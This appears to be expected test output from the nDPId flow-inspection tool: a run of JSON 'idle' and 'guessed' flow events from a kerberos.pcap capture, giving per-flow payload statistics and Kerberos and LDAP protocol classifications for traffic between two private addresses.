-00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00706{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": 
{"hostname":"","domain":"","username":""}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00710{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": 
{"hostname":"","domain":"","username":""}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00705{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7440000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7440000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": 
{"hostname":"","domain":"","username":""}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":477,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00705{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951709,"flow_last_seen":1549337951710,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": 
{"hostname":"","domain":"","username":""}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951709,"flow_last_seen":1549337951710,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952265,"flow_last_seen":1549337952266,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952265,"flow_last_seen":1549337952266,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952280,"flow_last_seen":1549337952281,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952280,"flow_last_seen":1549337952281,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00704{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": 
{"hostname":"","domain":"","username":""}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931189,"flow_last_seen":1549337931190,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931189,"flow_last_seen":1549337931190,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 
-00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937690,"flow_last_seen":1549337937691,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937690,"flow_last_seen":1549337937691,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937700,"flow_last_seen":1549337937701,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937700,"flow_last_seen":1549337937701,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 
-00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952273,"flow_last_seen":1549337952274,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952273,"flow_last_seen":1549337952274,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 